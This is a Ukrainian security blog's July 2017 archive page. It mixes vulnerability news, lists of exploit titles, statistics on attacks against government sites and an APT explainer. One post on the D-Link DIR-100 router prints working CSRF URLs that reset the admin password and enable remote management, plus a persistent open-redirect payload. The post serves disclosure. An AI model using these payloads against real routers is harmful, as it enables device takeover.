Архів за Липень, 2017

Уразливості в плагінах для WordPress №263

23:51 29.07.2017

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Twitter, User Role, Google Adsense, WooCommerce, Gallery Master. Для котрих з’явилися експлоіти.

  • WordPress Twitter 2.37 Cross Site Scripting (деталі)
  • WordPress User Role 1.4.1 Cross Site Scripting (деталі)
  • WordPress Google Adsense 1.29 Cross Site Scripting (деталі)
  • WordPress WooCommerce 2.4.12 PHP Code Injection (деталі)
  • WordPress Gallery Master 1.0.22 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Мій виступ на каналі Настоящее Время

22:45 29.07.2017

В серпні, 17.08.2017, я дав інтерв’ю для телеканалу Настоящее Время.

Воно вийшло на каналі в програмі Час Олевского. Сюжет про українських хакерів з моїм інтерв’ю на 46 хвилині. Всі бажаючі можуть його подивитися.

Вийшов Google Chrome 60

19:02 29.07.2017

У липні, 25.07.2017, через півтора місяці після виходу Google Chrome 59, вийшов Google Chrome 60.

В браузері зроблено багато нововведень. Та виправлені численні уразливості.

Виправлено 40 уразливостей. З яких більшість виявлені в результаті автоматизованого тестування інструментами AddressSanitizer, MemorySanitizer, Control Flow Integrity і LibFuzzer. Що більше ніж в попередній версії.

  • Выпуск web-браузера Chrome 60 (деталі)

Нові уразливості в D-Link DIR-100

16:24 29.07.2017

28.10.2015

У січні, 29.01.2015, я виявив Cross-Site Request Forgery та URL Redirector Abuse уразливості в D-Link DIR-100. Це друга частина дірок в router DIR-100.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DIR-100 та D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

29.07.2017

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin

Увімкнення Remote Management:

http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

CSRF атака для зміни паролю адміна та увімкнення Remote Management:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

URL Redirector Abuse (WASC-38):

http://site/Tools/vs.htm?location=http://www.google.com

Це Persisted Redirector атака. Після вказанная адреси в параметрі location, вона зберігаться і в подальшому можна редиректити лише про заході на сторінку http://site/Tools/vs.htm.

Уразлива версія D-Link DIR-100, Firmware v1.01. Дана модель з іншими прошивками також повинна бути вразливою.

Атаки на державні сайти України за 16 років

22:41 28.07.2017

В своєму звіті про атаки на державні сайти України за 15 років, я навів статистику атак на державні сайти України за останні 15 років, а зараз наведу статистику за останні 16 років.

За 2001 - 2016 роки всього було атаковано 956 українських державних сайтів (включаючи взломи сайтів та DDoS атаки). Це без врахування інфікованих gov.ua сайтів, яких було виявлено чимало за час моїх досліджень інфікованих сайтів в Уанеті.

Статистика від 2 атакованих веб сайтів в 2001 році до 137 атакованих веб сайтів в 2016 році.

Атаки на державні сайти в Уанеті

Добірка експлоітів

20:07 28.07.2017

В даній добірці експлоіти в веб додатках:

  • TOPSEC Firewalls - ‘ELIGIBLEBOMBSHELL’ Remote Code Execution (деталі)
  • Sakai 10.7 - Multiple Vulnerabilities (деталі)
  • Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure (деталі)
  • MiCasaVerde VeraLite - Remote Code Execution (деталі)
  • Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit) (деталі)

Похакані сайти №342

17:29 28.07.2017

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://nu-rada.gov.ua (хакером silo) - 17.12.2016 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://barrda.gov.ua (хакерами з Anonymous Ghost Gaza) - 31.12.2016 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://sambir.net (хакерами з chinafans) - 29.06.2017, зараз сайт вже виправлений адмінами
  • http://www.palace.kiev.ua (хакером з Bortecine Tim)
  • http://zeusnet.ua (хакером з Mister Spy) - 30.06.2017, зараз сайт вже виправлений адмінами

Розвинена постійна загроза - Advanced Persistent Threat

23:51 27.07.2017

Вперше термін Advanced Persistent Threat (APT) почав застосовуватися в січні 2010 року, коли була проведена Операція Аврора. Цей тип кібератак означає цільову розвинену атаку, що проводиться тривалий час до отримання необхідного результату.

Якщо така APT атака як Operation Aurora проводилася проти американських компаній, то з того часу дуже багато державних установ, компаній та окремих осіб зазнали таких атак. Враховуючи, що такі кібератаки постійно загрожують будь-якій компанії чи особі, що підключена до Інтернет, яка стала цікавою для нападників, то їх називають APT атаками - Розвинена постійна загроза.

В останні роки було проведено (росіянами як я вважаю) декілька значних APT атак проти України, не кажучи про цільові атаки на окремих волонтерів, військових чи державних службовців.

Про деякі з них я розповідав у своїй доповіді Кібервійна проти України та захист від гібридних загроз у лютому на круглому столі НАТО. Та у багатьох своїх інтерв’ю.

Зокрема це такі атаки як кібератаки на енергосистему України в грудні 2015 року і в грудні 2016 року. Та масштабна вірусна атака в Україні, що відбулася 27.06.2017 і торкнулася багатьох державних і приватних компаній. Про неї розповідав на UATV та інших каналах.

Уразливості в Apple Safari і Webkit

22:48 27.07.2017

Виявлені уразливості безпеки в Apple Safari і Webkit.

Уразливі продукти: Apple Safari 8.0, Safari 9.1, Safari 10.1.

Пошкодження пам’яті, виконання коду, DoS, витік інформації, підробка адресного рядку, XSS.

Зокрема вони виправили DoS уразливість в Firefox, Opera та Chrome, про яку я повідомив ще в 2008 році і назвав DoS через друк (printing DoS attack). Виявив її в різних браузерах і в своїх статтях наголошував, що вона може стосуватися всіх браузерів з функцією друку. Тоді в мене не було Safari, тому не перевіряв в цьому браузері, але не сумнівався в його вразливості. На початку 2016 перевірив я перевірив цю та інші уразливості в Safari 6.0.1 та 8.4.1 для iOS, а 4 червня перевірив їх в Safari 10.0.2 та 10.3.2 для iOS. Про що повідомляв Apple в цьому ти минулому році, але вони проігнорували. Щоб в липні виправити цю DoS через дев’ять років після мого анонсу даної уразливості - без жодної згадки про мене чи подяки, з посиланням на іншого секюріті дослідника.

Липневі DDoS атаки та взломи

20:03 27.07.2017

Раніше я писав про червневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію липні.

В зв’язку з сепаратистськими і терористичними акціями на сході України, хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Іноземні хакери провели неполітичні взломи державних сайтів:

justice-dn.gov.ua (хакером maress) - 02.07.2017
Та ще 23 gov.ua-сайти хакером maress.
mon.gov.ua (українським хакером) - 11.07.2017

Проукраїнськими хакерами були атаковані наступні сайти:

Липневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі місяця.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт freedom.kiev.ua (через вплив на хостера) - 07.2017
Закритий сайт gumbat.su (через вплив на хостера) - 07.2017